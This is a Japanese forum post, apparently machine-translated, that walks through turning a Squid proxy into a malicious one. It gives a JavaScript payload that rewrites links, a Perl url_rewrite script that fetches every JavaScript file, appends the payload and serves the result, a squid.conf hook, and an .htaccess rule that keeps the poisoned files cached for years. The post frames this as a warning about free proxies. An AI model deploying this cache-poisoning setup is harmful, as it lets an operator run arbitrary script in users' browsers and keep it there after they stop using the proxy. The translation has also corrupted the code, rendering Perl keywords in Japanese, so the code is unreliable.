この投稿は2015年6月7日23:19にMo Xiaowenによって最終編集されました。
これはSQUIDの設定を変更するだけで可能です
SQUIDとは何ですか?
Squidはインターネットデータをキャッシュし、ユーザーからのダウンロードリクエストを受け取り、ダウンロードしたデータを自動処理するソフトウェアです。 ユーザーがホームページをダウンロードしたい場合、スクイッドにリクエストを送り、スクイッドに代わりにダウンロードを依頼し、スクイッドがウェブサイトに接続してホームページをリクエストし、バックアップを保持しながらユーザーにホームページを送ることができます。他のユーザーが同じページに申請すると、スクイッドは保存したバックアップを即座にユーザーに送り、ユーザーが速度をかなり速く感じられるようにします。 SquidはHTTP、FTP、GOPHER、SSL、WAISなどのプロトコルをプロキシでき、Squidは自動的に処理し、必要に応じて不要なものをフィルタリングできます。
SquidはAIX、Digital、UNIX、FreeBSD、HP-UX、Irix、Linux、NetBSD、Nextstep、SCO、Solaris、OS/2など、多くのオペレーティングシステムで動作します。
実装は非常にシンプルです:
1. 1台のLinuxサーバーにSquidをインストールする。
2. サーバーのコードを修正し、送信されたすべてのjavascripにコードの一部を挿入し、送信します。
3. 修正したjsファイルのキャッシュ時間をできるだけ高く設定します。
この方法はSSLが有効なウェブサイトにも当てはまります。httpサイトのjqueryのような安全でないリソースを読み込むと、ほとんどのブラウザは警告を出しますが、あまり注意を払わない人は少ないです。
Chemaによると、彼がプロキシをリリースして数日後に5,000人以上が使っており、ほとんどの人はプロキシを使って悪意のあることをしたのです。なぜならプロキシを使っていたからです。匿名で安全だと思っていたのですが、プロキシサーバーが悪いことをするとは思っていませんでした。
悪意のあるプロキシサーバーを作ってください
すでにSquidプロキシサーバーを持っている場合は、Apacheのようなウェブサーバーも必要です。
ステップ1 ペイロードの作成
私は簡単なスクリプトをデモンストレーションとして使い、すべてのハイパーリンクを自分のウェブサイトに向けています。
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
ステップ2:すべてのJSファイルを感染させるスクリプトを書く
/etc/squid/poison.pl
[mw_shl_code=perl、true]
#!/USR/bin/perl
$|=1;
$count = 0;
$pid = $$;
while(<>)
{
チョンプ $_;
if($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
システム("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
「http://127.0.0.1:80/tmp/$pid-$count.js」を印刷;
}
そうでなければ
{
印刷「$_」;
}
$count++;
}[/mw_shl_code]
このスクリプトはwgetを使ってページの元のjavascripを取得し、tファイルを削除し、/etc/squid/payload.jsのコードを追加して修正ファイルをクライアントに送ります。一方で、/var/www/tmpディレクトリを作成し、Squidがファイルを書き込めるようにする必要があります。 このディレクトリには修正されたjsファイルを保存します。
ステップ3:上記のスクリプトをスクイッドと組み合わせる
/etc/squid/squid.confに追加してください
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
ステップ4:キャッシュを決して失敗させない
/var/www/tmp/.htaccess
[mw_shl_code=html、true]有効期限有効
期限切れデフォルト「アクセスプラス3000日」[/mw_shl_code]
これにより、Apacheはユーザーがキャッシュを整理するまで長い有効期限を提示します。
このプロキシを接続すると、どのハイパーリンクでも私のウェブサイトにリダイレクトされ、後でプロキシを使わなくてもキャッシュは残ります。 私は攻撃的でないペイロードを使っただけで、この方法ならハッカーははるかに多くのことができる。 ですので、無料プロキシの使用には自分や友人に注意するように伝えてください。
|
掲載地 2015/01/19 2:34:56
|
|
|
|
掲載地 2015/01/19 8:48:45
|
地主|
掲載地 2015/01/20 14:36:06
|
